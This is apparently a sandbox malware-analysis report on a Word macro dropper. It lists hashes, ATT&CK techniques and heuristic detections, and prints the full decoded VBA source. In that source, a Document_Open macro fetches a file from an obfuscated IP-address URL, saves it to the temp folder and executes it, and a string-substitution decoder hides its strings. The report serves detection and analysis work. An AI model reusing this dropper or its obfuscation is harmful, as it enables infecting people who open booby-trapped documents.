Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea1a22ffedc2ce74…

MALICIOUS

Office (OLE)

125.0 KB Created: 2018-10-14 21:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 879353857379429d7768400e33a9e5c2 SHA-1: 35124244bfe4cf9d0539f7c2862a6b926589b4e8 SHA-256: ea1a22ffedc2ce74021ae25cce19f713457acc1e5f24b15d4dce65515c17becb
258 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros that attempt to download and execute a payload, as indicated by the 'OLE_VBA_HTTP_DROP_EXEC' heuristic. The document body explicitly prompts the user to 'enable content' to view the document, a typical social engineering tactic. The VBA macro code is heavily obfuscated, making it difficult to determine the exact payload or destination URL, but the overall intent is to download and execute a secondary stage.

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-6922941-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6922941-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    §¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ² = ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("microsoft.xmlhttp")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£ = Environ("tmp") + °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("\ZQFMâG¶TØ.ÂÛÂ")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8659 bytes
SHA-256: 20bc4f5d23553c89ba474415df1a7f9fbccc3fbc9b7d54cb62c9ff07232ef186
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
    Public Function °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º)
        ¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
        ¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º)
            £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£® = InStr(¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢, Mid(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º, i, 1))
            If £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£® > 0 Then
                ¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª = Mid(¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯, £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®, 1)
                °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ + ¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª
            Else
                °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ + Mid(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º, i, 1)
            End If
        Next
        °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿
    End Function

Private Sub Document_Open()
Dim ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·
Set ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("microsoft.xmlhttp")
Dim ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£
Dim µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·
Set µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("Shell.Application")

¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£ = Environ("tmp") + °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("\ZQFMâG¶TØ.ÂÛÂ")
¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Open "GET", °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("hÖÖÓ://²00.6³.45.1²9/ÕÜÕÖÂm/âFF§ÅÒ_ÒÙÖÓÙÖ8â44à1F.ÂÛÂ"), False
¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.send
§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ² = ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.responseBody
If ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Status = 200 Then
Set ²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´ = CreateObject("adodb.stream")
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Open
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Type = 1
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Write §¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.SaveToFile ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£, 2
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Close
End If
µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Open (¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£)


End Sub

Attribute VB_Name = "NewMacros"
Sub dfafOrigin()
'
' dfafOrigin Macro
'
'

End Sub